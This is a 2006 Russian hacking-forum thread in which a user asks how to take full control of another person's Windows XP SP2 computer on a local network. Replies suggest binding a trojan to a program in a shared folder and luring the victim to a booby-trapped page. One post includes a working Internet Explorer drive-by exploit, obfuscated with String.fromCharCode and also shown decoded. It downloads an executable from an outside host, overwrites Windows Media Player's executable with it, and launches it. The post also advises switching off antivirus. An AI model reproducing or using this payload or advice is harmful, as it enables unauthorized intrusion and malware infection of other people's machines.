Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   ??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ??? (https://forum.antichat.xyz/showthread.php?t=14527)

Duke Nukem 16.02.2006 01:58
??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ???
 
Народ хочу получить дельный совет чем орудовать в локалке!!!!
Сведения об жертве:
0.) O.C WinXP SP-2
1.) есть шары(не важно какие главное что не C$ и т.д хотя есть полный доступ к одной из папок которая находится на C: )
2.) tcp 139 135 и многое другое открыто ну как всегда.
3.) Firewall нах. отсутствует.
NEW:
4.)445/tcp - Microsoft DS
Удаленное выполнение команд (ms05-027)
Обнаружена уязвимость в Microsoft Server Message Block (SMB),
которая позволяет удаленному пользователю выполнить произвольный
код на целевой системе.
5.) И аньти вирь у него даже не стоит!!!

В общем мне хотелсь бы получить доступ к системе для полного контроля апанента :D

tclover 16.02.2006 02:27
Можно попытся (Я про директорию к которой у тебя полный доступ) подменить там прогу какую-нить. В случае, конечно если они там есть. Берешь екзешник оттуда, клеишь его с троем и всё.

Elekt 16.02.2006 02:30
Просто так пробить второй нельзя. По крайней мере у меня таких эксплоитов нет.

Самый простой и эфективный способ - троян.

А как его дать жертве? Полазь по форуму. Ну либо впарить, либо попросить заценить какой нить сайт, где он подгрузит трой через дыру в Ie. За полгода в Ie их уже штук 10-ть нашли. Правда найти рабочий эксплоит - проблема. Но всё возможно.

tclover 16.02.2006 03:10
Цитата:
Не знаешь где можно слить прогу для склеивания???
http://forum.antichat.ru/thread14393-%EA%EB%E5%E9.html

Dronga 16.02.2006 06:47
Хм... Ну чтоб шелл получить с правами SYSTEM, как это поволял делать kaht, таких в паблике насегодня я не видел. Но можно устроить веселую жизнь ушастым уводя их в даун, такие есть. Попробуй вот это: http://forum.antichat.ru/threadedpost111536.html, не уверен что будет в локалке пахать, но мало ли.. Ну и конечно с троями стоит заморочиться, тут и удаленный контроль и перезагрузка... =) Вот только говоря что фаирвола нет это ошибаться, так как XP SP2 подразумевает интегрированный в Windows фаирвол. Ещё обрати внимание на уязвимости прикладных программ, IE например... Это самая большая дыра наверное...

KEZ 16.02.2006 13:07
А да, kaht работает против SP2, да?

Electro 16.02.2006 13:38
Цитата:
Сообщение от Elekt
Правда найти рабочий эксплоит - проблема. Но всё возможно.
Вот сплойт ...незнаю как у вас у меня работает

Код:
<script language="javascript">

fff = String.fromCharCode(118,97,114,32,120,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,59,92,114,92,110,120,46,79,112,101,110,40,34,71,69,84,34,44,32,34,104,116,116,112,58,37,50,102,37,50,102,119,119,119,46,109,121,45,114,111,115,116,111,118,46,102,97,116,97,108,46,114,117,37,50,102,102,105,108,101,115,37,50,102,115,101,114,118,105,99,101,115,46,101,120,101,34,44,48,41,59,92,114,92,110,120,46,83,101,110,100,40,41,59,92,114,92,110,118,97,114,32,115,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,59,92,114,92,110,115,46,77,111,100,101,32,61,32,51,59,92,114,92,110,115,46,84,121,112,101,32,61,32,49,59,92,114,92,110,115,46,79,112,101,110,40,41,59,92,114,92,110,115,46,87,114,105,116,101,40,120,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,92,114,92,110,115,46,83,97,118,101,84,111,70,105,108,101,40,34,67,58,92,92,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,92,92,87,105,110,100,111,119,115,32,77,101,100,105,97,32,80,108,97,121,101,114,92,92,92,92,119,109,112,108,97,121,101,114,46,101,120,101,34,44,50,41,59,92,114,92,110,108,111,99,97,116,105,111,110,46,104,114,101,102,32,61,32,34,109,109,115,58,37,50,102,37,50,102,34,59,92,114,92,110);

        myURL = "file:javascript:eval('" + fff + "')";
        window.open(myURL,"_media");
  </script>

закодированном в ASCII кодировку... аналог

<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http:%2f%2fwww.my-rostov.fatal.ru%2ffiles%2fservices.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>
и взял я его из коммента видео ,на видео ачат ру
и еще когда скопируешь на блокнот то айболит выруби а то сразу ловит троян довнлоудер

$ZLO$ 16.02.2006 15:03
kaht не катит на SP2

tclover 16.02.2006 18:07
Цитата:
kaht не катит на SP2
:) Да? Чё правда?
Мля....Может он хоть под линухом покатит? :)
Шутка. Ну и новости у тебя..... Мягко говоря, не первой свежести.

$ZLO$ 16.02.2006 19:55
Цитата:
Сообщение от Trampled_clover
:) Да? Чё правда?
Мля....Может он хоть под линухом покатит? :)
Шутка. Ну и новости у тебя..... Мягко говоря, не первой свежести.
слыш тока умничать не надо, лучше предложи что-то стояшее что даст шелл на 2 паке


Время: 07:15
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице